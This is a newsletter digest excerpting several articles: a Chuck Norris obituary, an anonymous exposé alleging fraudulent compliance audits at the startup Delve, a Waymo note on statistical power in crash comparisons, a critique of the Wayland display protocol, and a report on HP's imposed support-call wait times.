10 interesting stories served every morning and every evening.
Chuck Norris, the martial arts champion who became an iconic action star and led the hit series “Walker, Texas Ranger,” has died. He was 86.
Norris was hospitalized in Hawaii on Thursday, and his family posted a statement Friday saying that he died that morning. “While we would like to keep the circumstances private, please know that he was surrounded by his family and was at peace,” his family wrote.
‘The Peacock and the Sparrow,’ Award-Winning Spy Thriller, Being Made Into Film by Producers Scott Delman, Zanne Devine (EXCLUSIVE)
“To the world, he was a martial artist, actor, and a symbol of strength. To us, he was a devoted husband, a loving father and grandfather, an incredible brother, and the heart of our family,” the statement continued. “He lived his life with faith, purpose, and an unwavering commitment to the people he loved. Through his work, discipline, and kindness, he inspired millions around the world and left a lasting impact on so many lives.”
As an action star, Norris had a degree of credibility that most others could not match.. Not only did he appear opposite the legendary Bruce Lee in 1972 film “The Way of the Dragon” (aka “Return of the Dragon”), but he was a genuine martial arts champion who was a black belt in judo, 3rd degree black belt in Brazilian Jiu-Jitsu, 5th degree black belt in Karate, 8th degree black belt in Taekwondo, 9th degree black belt in Tang Soo Do and 10th degree black belt in Chun Kuk Do.
Norris was extremely prolific in the late 1970s and ’80s, starring in “The Delta Force” and “Missing in Action” films, “Good Guys Wear Black” (1978), “The Octagon” (1980), “Lone Wolf McQuade” (1983), “Code of Silence” (1985) and “Firewalker” (1986).
Norris joined a bevy of other action stars in the Sylvester Stallone-directed “The Expendables 2” in 2012 after an absence from the screen of seven years.
While he scored high on credibility, Norris did not leaven his work with humor the way Arnold Schwarzenegger, Bruce Willis and Jackie Chan did. He was nevertheless the action star of choice for those seeking an all-American icon.
In 1984, Norris starred in “Missing in Action,” the first in a series of films centered around the rescue of American POWs purportedly still held after being captured during the Vietnam War. (Norris’ younger brother Wieland had been killed while serving in Vietnam, and the actor dedicated his “Missing in Action” films to his brother’s memory, but critics of Norris and producer Cannon Films maintained that the films borrowed too heavily from the central conceit of Stallone’s highly successful “Rambo” films.)
As Norris’ movie career began to wane, he made a timely move to television, starring in the CBS series “Walker, Texas Ranger,” inspired by his film “Lone Wolf McQuade.” The program ran from 1993-2001, and the actor reprised the role of Cordell Walker in the TV movies “Walker Texas Ranger 3: Deadly Reunion” (1994) and “Walker, Texas Ranger: Trial by Fire” (2005). (Also in 2005 Norris made the last film in which he starred, the straight-to-DVD “The Cutter.”)
In his later years, Norris was portrayed in memes documenting fictional, frequently absurd feats associated with him, such as “Chuck Norris kills 100% of germs” and “Paper beats rock, rock beats scissors, and scissors beats paper, but Chuck Norris beats all 3 at the same time.” In his later years Norris appeared in infomercials for workout equipment and became increasingly outspoken as a political conservative.
Carlos Ray Norris was born in Ryan, Okla.; his father served as a soldier in World War II. In 1958 he joined the Air Force as an Air Policeman (AP, analogous to the Army’s MPs). While serving at Osan Air Base in South Korea, Norris first acquired the nickname “Chuck” and began his training in Tang Soo Do (aka tangsudo), leading to his achievements in other martial arts and to his development of hybrid style Chun Kuk Do (“The Universal Way”). He returned to the U. S. and served as an AP at March Air Force Base in California.
After his 1962 discharge, Norris worked for aerospace company Northrop and opened a chain of karate schools; celebrity clients at the schools included Steve McQueen, Chad McQueen, Bob Barker, Priscilla Presley, Donny Osmond and Marie Osmond.
Norris made his acting debut in an uncredited role in the 1969 cult Matt Helm film “The Wrecking Crew,” starring Dean Martin. Norris met Bruce Lee at a martial arts demonstration in Long Beach, Calif., and played the nemesis of Lee’s character in 1972 movie “The Way of the Dragon” (retitled “Return of the Dragon” for U. S. distribution). In 1974 McQueen spurred Norris to begin taking acting classes at MGM.
Norris first starred in the 1977 action film “Breaker! Breaker!,” in which he played a trucker searching for his brother, who’s disappeared in a town with a judge who’s corrupt.
The actor proved his box office mettle with his subsequent films, “Good Guys Wear Black” (1978), “The Octagon” (1980), “An Eye for an Eye” (1981) and “Lone Wolf McQuade.”
Norris began starring in movies for Cannon Films in 1984. Over the next four years, he became Cannon’s most prominent star, appearing in eight films, including the three “Missing in Action” films; “Code of Silence” — qualitatively, one of his best films — the two “Delta Force” films and “Firewalker.” Norris’ brother Aaron Norris produced several of these films, and also became a producer on “Walker, Texas Ranger.”
A longtime supporter of conservative politicians, he wrote several books with Christian and patriotic themes.
Norris was twice married, the first time to Dianne Holechek from 1958 until their divorce in 1988.
He is survived by second wife Gena O’Kelley, whom he married in 1998; three sons, Eric, Mike and Dakota, daughters Danilee and Dina; and a number of grandchildren.
...
Read the original on variety.com »
The version that arrived in your mailbox is truncated. Visit the full article here to view the rest.
Reporters who want to get in touch: Drop an email at aicpnay@proton.me. In case my Proton account gets blocked or you don’t get an answer, tweet using the hashtag #AICPNAY with contact details and I’ll do my best to get in touch with you.
At its core, this article argues that Delve fakes compliance while creating the appearance of compliance without the underlying substance.
Delve achieves its claim of being the fastest platform by producing fake evidence, generating auditor conclusions on behalf of certification mills that rubber stamp reports, and skipping major framework requirements while telling clients they have achieved 100% compliance. Their “US-based auditors” are Indian certification mills operating through empty US shells and mailbox agents. Auditors breach independence rules by signing off anyway, leaving companies unknowingly exposed to criminal liability under HIPAA and hefty fines under GDPR.
Delve hands customers fabricated evidence of board meetings, tests, and processes that never happened. The platform forces companies to choose between adopting fake evidence or performing mostly manual work with little real automation or AI. It produces audit reports that falsely claim independent verification while Delve itself effectively wears the auditor hat, generating identical reports for all clients, including Lovable, Bland, Cluely, and NASDAQ-traded Duos Edge. It hosts trust pages that list security measures that were never implemented.
When clients ask hard questions, Delve dodges. They demand calls where founders charm, promise, and namedrop Lovable, Bland, and “every Fortune 500” as proof. When that fails, donuts arrive.
Preface - How it all startedWhat the leak and our research reveals
Two months ago, an email went out to a few hundred Delve clients informing them that Delve had leaked their audit reports, alongside other confidential information, through a Google spreadsheet that was publicly accessible. This email also claimed that Delve’s audit reports were fraudulent. The company I work for was one of those clients that received that email.
Instead of providing clarification and being transparent, Delve’s leadership decided to go into deny and deflect mode. When directly asking them for clarification, they flat-out denied everything.
This was serious, as it potentially involved nearly all of Delve’s clients and raised questions about the validity of the compliance reports Delve’s clients had received.
Multiple colleagues in my network received the same email. Having the shared experience of being underwhelmed with the Delve experience, and having the overall sense that something fishy was going on, we decided to pool resources and investigate together. This article is the result of that collaboration.
The reason we felt the way we did was due to how little actual work any of us had to perform to become ‘compliant’, combined with a product practically devoid of any real AI. It mostly felt like a SOC 2 template pack with a thin SAAS platform wrapper where you simply adopt and sign all templated documents. No custom tailoring, no AI guidance, no real automation. Just pre-populated forms that required you to click “save”.
Some of us have gone through compliance before and felt there was a huge mismatch between our past experience and our experience with Delve.
In this article I will walk you through a typical experience with Delve, the leak that exposed their operation, and how it revealed the fraud we uncovered. I will show, among other things, how for each of the below categories:
* Delve breaches AICPA/ISO rules by acting as auditor, generating pre-drafted assessments, tests, and conclusions
* Delve relies on audit firms that rubber stamp reports because genuine independent verification would expose the evidence as fabricated or deficient
* Delve misleads clients by claiming reports are produced by US-based CPA firms, when in reality they are produced by Delve and rubber stamped by Indian certification mills
* Delve leads clients to believe they are compliant when they are not
* Delve helps clients mislead the public by hosting trust pages that contain security measures that were never implemented
* Delve lies to clients when directly questioned, denying documented facts about the leak and report generation
* Delve markets AI-driven automation while the product is practically devoid of AI, relying on pre-populated templates, manual forms, and fabricated evidence
* Delve’s product is unable to get companies truly compliant
* Delve’s platform forces companies to choose between adopting fake evidence or performing mostly manual work with little real automation
* Unable to deliver real compliance through its platform, Delve depends on fraudulent auditors who rubber stamp reports for clients, falling back on off-platform manual work with external vCISOs and good auditors only when complaints or profile threaten its business interests
* Delve’s process results in clients violating GDPR and HIPAA requirements, exposing them to criminal liability under HIPAA and fines up to 4% of global revenue under GDPR
For any prospect considering Delve or any current Delve client:
Delve loves claiming this is all an attempt by their “jealous competitors” to fraudulently discredit them. When clients ask concrete questions, they dodge answering the question and instead coax you into getting on a call with them, where they charm you and tell you everything you want to hear. They’ll even throw in some donuts.
One other tactic they frequently employ is to promise issues won’t arise again because their old process, product or auditor is about to be or has already been replaced with something better, that they are about to see the results of. This is a deflection and delaying technique. Whenever they start being frequntly called out on using a particular auditor, they’ll switch to another equally dodgy one that hasn’t been flagged yet. If they’re called out on their deficient product, they point to a superior tier or new feature on the timeline that will solve everything.
Expressing unhappiness and a desire to leave will lead to Delve pairing you with an external virtual CISO that will help you do compliance right. You should know that this means you will have to do all the work manually.
If you are concerned about Delve’s conduct and practices, ask them questions in writing. Do not allow them to deflect. Do not get on a call with them. In the closing words at the end of this article you’ll find more advice.
All information contained in this article can be reproduced by consulting public sources and having access to the Delve platform.
All screenshots and information are actual as of mid January 2026.
Here we set the stage. We’ll quickly list all parties involved, and will provide some background context that is useful to understand the rest of this article.
High profile companies like those listed in the image above, and hundreds of others are affected by this. Companies additionally affected are those that partner with Delve’s clients, having been misinformed of the risks involved in partnering with those clients.
Many of those companies process PHI of millions of US citizens on a daily basis. Some of those even serve national defense interests.
The audit firms listed in the illustration above were identified during our research process, but are not necessarily all audit firms used by Delve.
From what we were able to establish, 99%+ of Delve’s clients went through either Accorp or Gradient over the past 6 months.
In the wake of Delve’s leak in December, Delve is reported to have switched to Glocert as their primary ISO 27001 auditing firm.
* Karun Kaushik and Selin Kocalar - The founders of Delve
The above individuals knowingly participated in Delve’s deliberate misconduct regarding audit practices.
Delve is a compliance company. They help businesses get certified for frameworks like SOC 2, ISO 27001, HIPAA, and GDPR. Companies need these certifications to prove they handle data in a secure way and to unlock deals with larger customers who require them.
Compliance has traditionally been a time-consuming process that involved lots of spreadsheets. It used to be manual, expensive and slow.
To give you an idea of what this is all about, we will primarily focus on SOC 2 in this article. SOC 2 is the most commonly pursued framework in the US. Practically all tech companies that sell to enterprises are expected to be ‘SOC 2 compliant’, which basically means they’ve had to have a SOC 2 audit performed in the last year.
Getting a clean SOC 2 report means hiring a CPA firm to review your security controls. If they successfully verify the security you claim to have, through a lot of evidence you provide them, they issue a report saying your security measures are sound. This report becomes proof you can show customers and investors.
SOC 2 and ISO 27001, the European counterpart to SOC 2, are voluntary frameworks. HIPAA and GDPR are not.
HIPAA applies to any company handling health records in the US. Penalties are severe, with willful neglect punishable by criminal charges and prison time.
GDPR covers any company processing data of EU residents, regardless of where the company is based. Fines run up to 4% of global annual revenue or 20 million euros, whichever is higher.
These frameworks carry the force of law because they protect information people cannot easily protect themselves: medical histories, genetic data, biometric identifiers, location patterns, and the full record of their digital lives.
The companies that help other companies become compliant through automation are called GRC automation platforms.
Delve was founded in 2023 by Karun Kaushik and Selin Kocalar, both Forbes 30 Under 30 members and MIT dropouts who met as freshmen. They started with a medical AI scribe, pivoted to compliance after hitting HIPAA headaches themselves, and went through Y Combinator in 2024.
In July 2025, Delve raised $32 million in Series A funding led by Insight Partners. Before that they had raised a $3.3 million seed round and went through Y Combinator.
Delve’s pitch is speed through AI. They claim to get companies compliant in days rather than months, using what they call “agentic AI” through an “AI-native” platform.
Their marketing promises AI agents that automatically collect evidence, write reports, and monitor compliance gaps without human busywork.
The reality, as this article will show, is different.
SOC 2 audits operate under strict independence requirements designed to preserve trust in the attestation process. These rules exist precisely to prevent the kind of conduct this article exposes. While Delve offers compliance services for HIPAA, GDPR, and ISO 27001, this article focuses primarily on SOC 2. The rules surrounding those other frameworks would require their own detailed treatment; the goal here is to establish a clear pattern in Delve’s behavior, not to catalog every possible regulatory violation.
The fundamental principle is simple: the party implementing controls cannot be the party attesting to their effectiveness. AICPA’s Code of Professional Conduct states that members must “accept the obligation to act in a way that will serve the public interest, honor the public trust, and demonstrate a commitment to professionalism.” When accountants cannot be expected to make truthful representations, “we lose the ability to assess any public or private company’s actual performance.”
For SOC 2 specifically, AT-C Section 205 requires practitioners to maintain independence in both fact and appearance throughout the engagement. The practitioner must not assume management responsibilities or act as an advocate for the subject matter being examined.
Under AT-C Section 315, auditors must “seek to obtain reasonable assurance that the entity complied with the specified requirements, in all material respects, including designing the examination to detect both intentional and unintentional material noncompliance.” This requires independent design of test procedures, independent evaluation of evidence, and independent formation of conclusions.
The auditor’s report must represent their own professional judgment, not pre-written conclusions provided by the entity being audited or its platform vendor.
Delve’s model inverts this structure. By generating auditor conclusions, test procedures, and final reports before any independent review occurs, Delve places itself in the role of both implementer and examiner. This is not a technicality. It is a structural fraud that invalidates the entire attestation.
For readers who wish to verify these requirements:
This story has many threads, and I struggled with where to start. Do I lead with the leaked documents? The auditor shell game? The fake AI?
In the end, I felt that starting with my company’s experience, which illustrates many of the points I make and prove later on, was the most effective way to get the picture across.
I collaborated on this article with users from other Delve clients. We compared notes. The patterns I describe below showed up across all of our accounts. Unless mentioned otherwise, nothing here is cherry-picked. Later sections dissect specific mechanisms.
This section shows what it is like to be a Delve client.
Delve goes all out during the sales process. Through their marketing and sales process they continuously emphasize being the fastest to get companies compliant, thanks to their AI. They repeatedly emphasize the impressive companies they work with, and how they partner with the best and most respected US-based audit firms, and that their work is accepted by Fortune 500 companies.
Within the first few minutes of the demo call we did with Delve, they had already mentioned how companies like Lovable, Bland, WisprFlow and hundreds of others are choosing Delve over competitors. The main point they kept driving home was that their revolutionary tech, supposedly way ahead of any other company’s, enabled compliance to be achieved with just 10 hours of work instead of the hundreds it used to take.
Their demo was short but did a good job showing how automated everything supposedly was. They clicked through everything pretty quickly, and stopped at every place that made the process look easy or automated. They showed an integration pulling information out of AWS, the “ready to go” default policies you could just adopt without modification, the reasonably short list of tasks, the AI questionnaire automation, the beautiful trust page you could publish and their ‘AI-copilot’ chatbot.
What they didn’t show, however, was that most integrations were fake and required manual screenshots, that tons of forms need to be manually filled out, that the trust page wasn’t accurate and they didn’t show any of the tasks that had pre-created fake evidence.
Their “best offer” for SOC 2 started at $15,000, which we were able to negotiate down to $13,000 on the call. They kept emphasizing how it was a great deal, that we were getting so much value that other companies paid more for. They remained pretty inflexible on pricing until we made clear we were considering a competitor. We must have been told at least four times that they couldn’t go any lower because they’d make a loss. There was a lot of pressure and posturing, but the price quickly dropped to just $6,000 when they realized we were serious about going elsewhere, and they would throw in ISO 27001 and a 200 hour penetration test as well.
Pushing us to sign within 24 hours or lose that good a deal, we decided to just move forward and get it over with. In hindsiht, there were many red flags, but we just wanted to get the job done quickly and move on. If Delve was good enough for companies like Lovable, they had to be doing something right. Right?
Once you’ve been invited to the Delve platform and log in for the first time, you’ll be greeted with an interface that reveals there are four categories for activities:
But even before you get started doing any real work, you can go into the trust tab and activate and publish the trust page for your company. You’d think it would probably be a very minimal trust page with everything failing at first, since you haven’t done any work, right?
Nope, you immediately get a fully populated trust page that would have you believe you’re running the most secure company on earth. Delve’s trust page presented our company as fully secure before we had completed any compliance work, enabling us to close deals based on misrepresented security claims.
Noteworthy is that the list hadn’t changed after we finished compliance in any way, but still wasn’t truthful. My expectation was that the list reflected the security you’d get at the end of Delve’s process, but it took getting there to learn that that wasn’t true either.
It says we did vulnerability scanning and a pentest, when we only ever did the scan. It says we did data recovery simulations, which we never did. It says we remediated vulnerabilities, which we never did.
It is literally a made-up list of security measures of which more than half are not implemented, or even supported or addressed by Delve’s process and platform.
In short, this product is built to help companies fake security rather than communicate their real security.
When you do actually decide to get started and do the work, you’ll find that the platform expects you to perform a number of tasks across four categories:
Policies - These are all pre-created, and Delve recommends adopting them as they are.
Sadly, unless you spend a whole week of manually revising them to be accurate, you will have inaccurate policies full of false promises. Every single one of Delve’s policies claims to have measures in place that Delve’s process and platform do not address. Even though we knew we’d technically be lying about our security to anyone we sent these policies to for review (clients, auditors, investors), we decided to adopt these policies because we simply didn’t have the bandwidth to rewrite them all manually. Team - Background checks, security training and manual device security through screenshots for every employee.
This is a lot of manual work. it took each of our emloyees 2 hours to their individual tasks done.30 minutes to manually secure and screenshot laptop security configuration. It is a lot of work if you have a big company.
Also, we didn’t have disk encryption support on a few laptops, but that didn’t stop Delve from signing off on HIPAA:
30 minutes (or more) to manually write up a performance evaluation:30 minutes to do all training (watching Delve’s Youtube videos) and quizzes.
Tech - You add vendors here. This is what Delve calls integrations, but most of these are just forms where you are asked to submit screenshots:Company - Security procedures and company-wide tasks are live here. This is just a list of forms that are all pre-filled with fake evidence. You can speedrun through this by just clicking accept on every one of them.
One thing that stands out as you go through all of Delve’s tasks is that there isn’t any AI to speed up any of the work. The only thing available is an ‘AI Co-pilot’ that can provide generic advice, and that doesn’t seem to have much context beyond what form you’re in. More than half of the time the AI co-pilot would tell me the evidence in the platform was not sufficient, and it would refer to links of other GRC platforms.
As opposed to what is promised during the sales process, the tasks are not customized to the company. You are basically dumped into an interface and told by the customer success person that you can ask questions on Slack if you get stuck.
The reality is that there will be very few times you’ll ever need any help from Delve’s team, primarily because everything in their platform is pre-populated. You won’t have to ask how to do a risk assessment, because you get the same pre-generated risks that every other Delve customer gets. You won’t have to complain about having to do board meetings, after you were explicitly promised during the sales call that this is something all other providers but Delve ask for, because you get pre-created fake board meeting notes that you can adopt as is.
Seriously, becoming compliant with Delve is nothing more than clicking through a bunch of pre-populated forms and accepting everything. Unless you want to do compliance the proper way, in which case Dropbox is as good a tool as Delve since you need to then manually collect and write everything.
Ok, you sit down to get cracking on compliance. What do you do next?
You accept the default policies that are inaccurate out of the box. Like this policy that claims to have an MDM in place when the Delve process consists of making a manual screenshot of your Mac firewall settings:
You accept the pre-created contents for security simulation by accepting the three “security incidents”:
You do the risk assessment by adopting the ten default risks:
One of our obvious concerns was that this approach would never pass an audit, but we were explicitly told Delve never failed a single audit in the past, and that auditors have never flagged a single issue with their process. They tried to put our minds at ease by telling us about all the amazing Delve clients that sold to Fortune 500 companies using the exact same process.
Delve continuously reminding us that they serve clients like Lovable, Bland, WisprFlow and many others ended up wearing us down, so we just took their word for it and moved on.
When the time comes to actually hook up your stack to Delve, so that Delve can do that ‘continuous monitoring’ thing, you’ll find that the vast majority of their integrations don’t integrate with anything at all. They are just containers for screenshots you’ll have to go out and manually collect.
Imagine my surprise when I learned that AI-native compliance would mean I’d have to spend many hours manually collecting screenshots and filling out forms. I truly feel like a mindless agent in what Delve calls “the agentic experience”.
Here you can see how the Linear ‘integration’ consists of Manual Tests and Forms:
On the employee tab, you manually do background checks through Certn, fill out more forms, watch useless YouTube videos, and manually screenshot laptop security. For 100 employees, all 100 of them have to manually secure laptops once and upload screenshots.
You also do manual performance reviews for every employee with no way to pull data from other solutions. Lots of typing if you have 20+ employees.
...
Read the original on substack.com »
It may seem like the miles driven by Waymo (in the 100’s of millions of miles) pales in comparison to the billions of miles driven in the cities where Waymo drives, or trillions of miles driven annually in the entire United States. When comparing the rates of two populations, however, the conclusions you can draw from data are governed by what is called statistical power. The question being answered by the Safety Impact Data Hub is are the Waymo and benchmark crash rates different? The input to this calculation is the number of crashes and the number of miles driven by Waymo and the benchmark populations and is modeled using a Poisson distribution, the most common distribution for handling count data.
An example of this problem would be to examine the number of students that do not pass an exam. In a school district, say that 300 out of 1,000 students that take the same test do not pass (3 do not pass per 10 testtakers). One could ask whether a Class A of 20 students performed differently than the overall population on this test (note we are assuming passing or not passing the test is independent of being in Class A for the sake of this simplified example). Say Class A had 10 out of 20 students that did not pass the exam (5 do not pass per 10 test takers). Class A had a not pass rate that is double the rate of the school district. When we use a Poisson confidence interval, however, the rate of not passing in the class of 20 is not statistically different from the school district average at the 95% confidence level. If we instead compare Class A to the entire state of 100,000 students (with the same 3 not pass per 10 test takers rate, or 30,000 out of 100,000 to not pass), the 95% confidence intervals of this comparison are almost identical to the comparison to the county (300 out of 1000 test takers). This means that for this comparison, the uncertainty in the small number of observations in Class A (only 20 students) is much more than the uncertainty in the larger population. Take another class, Class B, that had only 1 out of 20 students not pass the test (0.5 do not pass per 10 test takers). When applying the 95% confidence intervals, this Class B does have a statistically different pass rate from the county average (as well when compared to the state). This example shows that when comparing rates of events in two populations where one population is much larger than the other (measured by test takers, or miles driven), the two things that drive statistical significance are: (a) the number of observations in the smaller population (more observations = significance sooner) and (b) bigger differences in the rates of occurrence (bigger difference = significance sooner).
Now consider another experiment with Waymo data. Consider the figure below that keeps the number of Waymo airbag deployment in any vehicle crashes (34) and VMT (71.1 million miles) constant while assuming different orders of magnitude of miles driven in the human benchmark population (benchmark rate of 1.649 incidents per million miles with 17.8 billion miles traveled). The point estimate is that Waymo has 71% fewer of these crashes than the benchmark. The confidence intervals (also sometimes called error bars) show uncertainty for this reduction at a 95% confidence level (95% confidence is the standard in most statistical testing). If the error bars do not cross 0%, that means that from a statistical standpoint we are 95% confident the result is not due to chance, which we also refer to as statistical significance. This “simulation” shows the effect on statistical significance when varying the VMT of the benchmark population. This comparison would be statistically significant even if the benchmark population had fewer miles driven than the Waymo population (10 million miles). Furthermore, as long as the human benchmark has more than 100 million miles, there is almost no discernable difference in the confidence intervals of the comparison. This means that comparisons in large US cities (based on billions of miles) are no different from a statistical perspective than a comparison to the entire US annual driving (trillions of miles). Like the school test example, Waymo has driven enough miles (tens to hundred of millions of miles) and the reductions are large enough (70%-90% reductions) that statistical significance can be achieved.
...
Read the original on waymo.com »
Wayland has been a broad misdirection and misallocation of time and developer resources at the expense of users. With more migration from other operating systems, the pressure to fix fundamental problems has become more prominent. After 17 years of development, now is a good time to reflect on some of the larger promises that have been made around the development of Wayland as a replacement for the X11 display protocol.
If you’re not in this space, hopefully it will still be interesting as an engineering post-mortem on taking on new greenfield projects. Namely: What are the issues with what exists, why can they not be fixed, what do we hope to achieve with a new project, and how long do we expect it to take?
If you’re already familiar with X11 and Wayland feel free to skip to the next part.
For people not familiar with Linux, here’s a quick rundown of the terms in this space, roughly in the order of highest-level to lowest-level:
* Applications
These are the things you want to run
* These are the things you want to run
* Desktop Environment (DE)
This is what manages things like window theming, notifications, task bars, etc.
* This is what manages things like window theming, notifications, task bars, etc.
* Compositor
This is what layers windows on top of each other and does animations, graphical effects, etc.
* This is what layers windows on top of each other and does animations, graphical effects, etc.
* Display Server
This is the thing that manages the display, it also abstracts away some of the hardware details so all the above work on NVidia, AMD, Intel, etc.
* This is the thing that manages the display, it also abstracts away some of the hardware details so all the above work on NVidia, AMD, Intel, etc.
* Kernel / Operating System
The lower-layer thing that manages hardware resources, for us this is Linux
* The lower-layer thing that manages hardware resources, for us this is Linux
The above is not a complete list, but it’s enough to give some framing for understanding that X11 is a fundamental piece of most Linux environments.
X11 is currently still the most common popular display server in the Linux ecosystem. It was developed in the mid-1980s and, as legacy projects tend to do, has accumulated functionality that makes it difficult to maintain, according to the developers.
So, in 2008, Kristian Høgsberg started the project that became known as Wayland. Wayland (in theory) replaces the display server, as well as some parts of the compositor and desktop environment with a simpler display protocol and reference implementation. The original conceit behind Wayland is to only implement what is needed for a simple Linux desktop. The original implementation was a little over 3,000 lines of code.
It’s 2026, and Wayland has reached a market share of around 40-50%, or closer to 50-60% depending on your source. I would argue a product that has taken 17 years to gain substantial marketshare has issues hindering adoption. Compare the development of Wayland to a similar project for managing audio: PipeWire. Within ~8 years, every alternative has been mostly replaced. It’s been adopted as the default in Ubuntu since 22.04, roughly 4 years after it first launched!
These are the most common issues I have seen from the perspective of a user, so I will try to stay light on what I consider to be mostly irrelevant technical details and instead focus on larger issues around the rollout and design of Wayland.
The reason I use Linux and other Unix-likes is that they give me the ability to do whatever I want on my system, including making mistakes! So why is my display server telling me that certain applications that I installed and chose to run aren’t allowed to talk to each other in the name of security?
There are multiple cases of this: OBS can’t screen record (it segfaults instead), I can’t copy-paste, and I can’t see window previews unless everything implements a specific extension to the core protocol.
The actual “threat model” here is baffling and doesn’t seem to reflect a need for users. Applications are not able to see each other’s windows, but they’re not able to interact in any other way that could potentially cause problems?
I also don’t care for the “security” argument when parts of the core reference implementation are written in a memory-unsafe language. To be clear, I am not saying that software written in C is bad, I’m specifically calling out that making a security arugment about software then repeating decisions of the previous (40-year-old) implementation is a bad look.
Several of the design decisions that Wayland makes are claimed in the name of performance. Namely, collapsing many layers is supposed to reduce the number of copies when moving data between different components.
However, whatever the reason, these performance gains haven’t materialized, or are so anecdotal in either direction that it’s difficult to claim a clear win over X11. In fact, you can find examples showing roughly a 40% slowdown when using Wayland over X11! I’m sure there are similar benchmarks claiming Wayland wins and vice versa (happy to link them as well if provided).
The problem is that, even if Wayland was twice as fast, it doesn’t compare to improvements in hardware over the same period. It would’ve been better to just wait! The performance improvements would have to be much more substantial for this to be a reasonable argument in favor of Wayland. The fact that the question even exists as to whether one or the other is faster after a substantial period is an obvious failure.
Additionally, those performance gains don’t matter if I’m not able to make use of them. For example, if I’m using the most popular graphics card vendor in my system, I shouldn’t expect things to work out of the box.
One rebuttal I’ve heard is that it’s not an issue with Wayland, it’s an issue with the compositor/extension/application. After all, “Wayland” isn’t a piece of software, it’s a simple protocol that other software chooses to implement!
Of course, what this means in practice is that there are multiple (usually incompatible) implementations of multiple different standards. Maybe this would be fine if the concept of a desktop operating system was completely new and unknown, but users balk when discovering things like drag and drop or screen sharing are not natively supported and are essentially still in “beta” status.
Instead of providing a better way of doing something, common features are not supported at all, and instead it’s the job of everyone else in the ecosystem to agree on a standard. That’s not a stunning argument in favor of replacing something that already exists and that has already been standardized in X11!
Wayland has been around for only 17 years, while X11 has closer to 40 years of development behind it. Things are still under development and obviously will get better, so why complain about issues that will inevitably get fixed?
Because it’s been 17 years and people are still running into major issues!
I was unpleasantly surprised when using KDE Plasma that the default display server had been changed to Wayland. I noticed very quickly on startup when I encountered enough graphical hitches to realize I was running Wayland and quickly switch back. Anecdotal experience is not enough to say this is a broad issue, but my point is that when an average user encounters graphical issues within 60 seconds of using it, maybe it’s not ready to be made the default! It was only within the last 6 months that OBS stopped segfaulting when trying to launch on Wayland. I assume I’m in decent company when even the developer of a major compositor is still not able to use Wayland in 2026.
The number of “simple” utilities that seem partially supported or half-baked is incredible and seems to be a massive duplication of effort. The tooling around X11 that has been developed over the last 40 years seems to have been completely dropped and no alternative has been provided. Instead of providing an obvious transition path, Wayland has introduced even more fragmentation.
Older software that has a ton of “legacy cruft” has been tested and bugs have long since been fixed. I fully believe with another 20 years of development things will be better. The problem is that I am being forced to make the switch now. See: The push from KDE and RedHat to Wayland and dropping support for older technologies.
This post probably best encapsulates the developer opinion towards users trying to migrate to the next iteration of the Linux desktop:
Maybe Wayland doesn’t work for your precious use-case. More likely, it does work, and you swallowed some propaganda based on an assumption which might have been correct 7 years ago. Regardless, I simply don’t give a shit about you anymore.
We’ve sacrificed our spare time to build this for you for free. If you turn around and harass us based on some utterly nonsensical conspiracy theories, then you’re a fucking asshole.
It’s even more ironic compared to the post made a week later, expressing the same frustration with the Rust community that people have with Wayland!
Drew has since deleted this post, so I understand if he no longer stands by those opinions. However, it’s a representative slice of developer sentiment towards users that are now being forced to use unfinished software. Entitlement and bullying of open-source maintainers is not appropriate, and it’s understandable that the developers lash out after feeling beaten down by entitled users. However, to have some sympathy on the user side, it’s likely born out of frustration of being forced to use the new hotness and then encountering breaking bugs that are impossible for the average user to work around.
It is not the fault of the original developers for building what they wanted to build. I think it’s important to keep in mind that they didn’t necessarily choose for Wayland to become as popular as it has or the foundation for the desktop of the future. See the diagram below:
Having Wayland as a developers-only playground is fine! Have fun building stuff! But the second actual users are forced to use it expect them to be frustrated! At this point I consider Wayland to be a fun toy built entirely to pacify developers tired of working on a finished legacy project.
Since most of this post has been overwhelmingly negative against the development of Wayland, it’s instead better to learn as much as possible and look forward towards “what would I want to be able to do”. Windowing technology is absolutely not “done”, and instead of following other operating systems, it would be fantastic if Linux could do things no other environment could do.
For example, being able implement non-rectangular windows, exposing context actions (similar to MacOS), or making it easier to automate or script parts of the desktop environment would be incredibly exciting!
It’s difficult to overstate the amount of progress in support for gaming, new (and old) hardware, as well as the amount of overall “polish”. Every developer should be proud to be a part of that!
After 17 years, Wayland is still not ready for prime time. Notable breakage is being documented, and adoption has been correspondingly slow.
For some users the switch is seamless. For others (including myself), they tend to bounce off after encountering workflow-breaking issues. I think it’s obvious at this point that the trade-offs have not been worth the hassle.
My prediction is that within the next 5 years the following will be true:
Projects will drop Wayland support and go back to X11
There will be a new display protocol that displaces both X11 and Wayland
The new display protocol will be a drop-in replacement (similar to XWayland)
Fragmentation will still be an issue (this one’s a freebie)
See you in 2030 for the year of the Linux Desktop.
Included are some of the links referenced in this post as well as some additional reading.
...
Read the original on omar.yt »
In an odd approach to trying to improve customer tech support, HP allegedly implemented mandatory, 15-minute wait times for people calling the vendor for help with their computers and printers in certain geographies.
Callers from the United Kingdom, France, Germany, Ireland, and Italy were met with the forced holding periods, The Register reported on Thursday. The publication cited internal communications it saw from February 18 that reportedly said the wait times aimed to “influence customers to increase their adoption of digital self-solve, as a faster way to address their support question. This involves inserting a message of high call volumes, to expect a delay in connecting to an agent and offering digital self-solve solutions as an alternative.”
Even if HP’s telephone support center wasn’t busy, callers would reportedly hear:
We are experiencing longer waiting times and we apologize for the inconvenience. The next available representative will be with you in about 15 minutes.
To quickly resolve your issue, please visit our website support.hp.com to check out other support options or find helpful articles and assistant to get a guided help by visiting virtualagent.hpcloud.hp.com.
Callers were then told to “please stay on the line” if they wanted to speak to a representative. The phone system was also set to remind customers of their other support options and to apologize for the long (HP-induced) wait times upon the fifth, 10th, and 13th minute of the call.
The mandatory support call times have been lifted, per a company statement shared by HP spokesperson Katie Derkits:
We’re always looking for ways to improve our customer service experience. This support offering was intended to provide more digital options with the goal of reducing time to resolve inquiries. We have found that many of our customers were not aware of the digital support options we provide. Based on initial feedback, we know the importance of speaking to live customer service agents in a timely fashion is paramount. As a result, we will continue to prioritize timely access to live phone support to ensure we are delivering an exceptional customer experience.
HP didn’t immediately clarify when it removed the wait times. Some HP workers were reportedly unhappy with the mandatory hold times, with an anonymous “insider” in HP’s European operations reportedly telling The Register, per its Thursday report: “Many within HP are pretty unhappy [about] the measures being taken and the fact those making decisions don’t have to deal with the customers who their decisions impact.”
...
Read the original on arstechnica.com »
